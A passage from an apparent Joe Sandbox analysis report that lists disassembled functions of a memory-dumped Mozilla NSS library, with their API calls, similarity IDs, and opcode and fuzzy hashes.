                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3021504977-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a03bf20087a87f92e754ec3027bffc2b5091352de3bb71a3a9869cfc92a7a1f7
                                                                                                                                                                                                                                                                                          • Instruction ID: 55f07ba33c453fcf0e1a2d447603f635efa32fdc88affe600b8a8fe685ba2b83
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a03bf20087a87f92e754ec3027bffc2b5091352de3bb71a3a9869cfc92a7a1f7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9316370504704CFD710AF69D68856AB7F0FF88359F15997DD88987B11EB30E884DB91
                                                                                                                                                                                                                                                                                          Function 6C734FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C73B60F,00000000), ref: 6C735003
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C73B60F,00000000), ref: 6C73501C
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C73B60F,00000000), ref: 6C73504B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6C73B60F,00000000), ref: 6C735064
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1112172411-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4878b3359c78a0aea5d28cf905d5101c07b002c9de4db295b0e079fa41485e82
                                                                                                                                                                                                                                                                                          • Instruction ID: 3dec4a4f5aba49a49585953c88cf50bb13c195671dd07e08e495259398baedc4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4878b3359c78a0aea5d28cf905d5101c07b002c9de4db295b0e079fa41485e82
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 153145B0A056168FCB40EF78D58466ABBF4FF09308B148939D89997702E735E894CBD1
                                                                                                                                                                                                                                                                                          Function 6C759F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C75A71A,FFFFFFFF,?,?), ref: 6C759FAB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C75A71A,6C75A71A,00000000), ref: 6C759FD9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75136A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75137E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: PL_ArenaGrow.NSS3(?,6C6EF599,?,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?), ref: 6C7513CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: PR_Unlock.NSS3(?,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75145C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C75A71A,6C75A71A,00000000), ref: 6C75A009
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,6C75A71A,6C75A71A,00000000), ref: 6C75A045
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3535121653-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                                                          • Instruction ID: c0e80f84a9c840688359631555693a4982cb254a31a5e9f363516bd322917bd6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 102183B4A002069BE7009F15DD54F66B7A9BF4536CF548138982D87B81FF76D425CBA0
                                                                                                                                                                                                                                                                                          Function 6C762DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C762E08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C762E1C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C762E3B
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C762E95
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6F88A4,00000000,00000000), ref: 6C751228
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C751238
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6F88A4,00000000,00000000), ref: 6C75124B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: PR_CallOnce.NSS3(6C852AA4,6C7512D0,00000000,00000000,00000000,?,6C6F88A4,00000000,00000000), ref: 6C75125D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C75126F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C751280
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C75128E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C75129A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7512A1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                          • Instruction ID: c9fddcabda40d721199e21de4c97cc298a0d9a6352f13d081b2622a783d6364a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B021D4B1E003454BE740CF559F4CBAA3768AFA134DF210279DD085BB42FBB1E698C292
                                                                                                                                                                                                                                                                                          Function 6C731870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C7318A6
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C716C34,?,?,00000001,00000000,00000007,?), ref: 6C7318B6
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C716C34,?,?), ref: 6C7318E1
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C7318F9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1944879095563cfdbe37030391ea953a13f062b0d1eead33d0a0eae418fb6b01
                                                                                                                                                                                                                                                                                          • Instruction ID: 1e71f364fb1bff503f1cf7d02e4be1958d8ef8a6c81c024ee3de99438ef07414
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1944879095563cfdbe37030391ea953a13f062b0d1eead33d0a0eae418fb6b01
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D21D071E002199BDB00AF68DC49AEA7B74FF09318F444079ED0967702EB35A928CBE1
                                                                                                                                                                                                                                                                                          Function 6C71ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C71ACC2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6F2F0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6F2F1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C6F0A1B,00000000), ref: 6C6F2AF0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F2B11
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C71AD5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7357D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C6FB41E,00000000,00000000,?,00000000,?,6C6FB41E,00000000,00000000,00000001,?), ref: 6C7357E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7357D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C735843
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C71AD36
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C6F2F65
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F2F83
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C71AD4F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b25edde41cd31e8eac257d0820cabac7d59ac91e2de94b48096ac31227e61a73
                                                                                                                                                                                                                                                                                          • Instruction ID: d5fa60bd2528ec75d041bb209f240ec6da6b56cb67d53f5a1bc2e27e52969d28
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b25edde41cd31e8eac257d0820cabac7d59ac91e2de94b48096ac31227e61a73
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1021C6B1D005148BEB10DF64DA0A5EEB7B4AF05228F494078D85877A01FB31AA59CBE5
                                                                                                                                                                                                                                                                                          Function 6C743C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C743C9E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C743CAE
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C743CEA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C743D02
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a5bdec11f7710118b97f037b55c71ca29952bfc5591dd47d7dfbe38ef1749b75
                                                                                                                                                                                                                                                                                          • Instruction ID: e8f0417185db25e5d7d2a8ad4a8b138e00952fa20bb44050a5a8a643737d5179
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5bdec11f7710118b97f037b55c71ca29952bfc5591dd47d7dfbe38ef1749b75
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F11D379A00204AFDB40AF24ED49A9A3778EF0936CF598475EC088B752E730ED54CBE1
                                                                                                                                                                                                                                                                                          Function 6C74ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C74F0AD,6C74F150,?,6C74F150,?,?,?), ref: 6C74ECBA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C74ECD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C74ED02
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75116E
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C74ED5A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                          • Instruction ID: d42d6586b280a3454d4b16053d822137b52ac017bc1b43c6a38685f675a203fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB21A4B1A007465BE700CF25DA49B52B7E4BFA4358F15C225E81C87661EB70E594CBD1
                                                                                                                                                                                                                                                                                          Function 6C77EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C767FFA,?,6C769767,?,8B7874C0,0000A48E), ref: 6C77EDD4
                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C767FFA,?,6C769767,?,8B7874C0,0000A48E), ref: 6C77EDFD
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C767FFA,?,6C769767,?,8B7874C0,0000A48E), ref: 6C77EE14
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C769767,00000000,00000000,6C767FFA,?,6C769767,?,8B7874C0,0000A48E), ref: 6C77EE33
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4831bc542098b9dd49ee7040b35bf7fc1d1c2b83c338fb9a34a6e07a1e27c10d
                                                                                                                                                                                                                                                                                          • Instruction ID: 0032d5750e47bdff6fe5eb25fe114c0a77cc19b132c4d3ddbf57036cff52eca1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4831bc542098b9dd49ee7040b35bf7fc1d1c2b83c338fb9a34a6e07a1e27c10d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E011A7B1A0070EAFEF209E65DE88B86736CEB0035DF244935E91982A41E370E464C7F1
                                                                                                                                                                                                                                                                                          Function 6C6FDFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: TlsGetValue.KERNEL32 ref: 6C7106C2
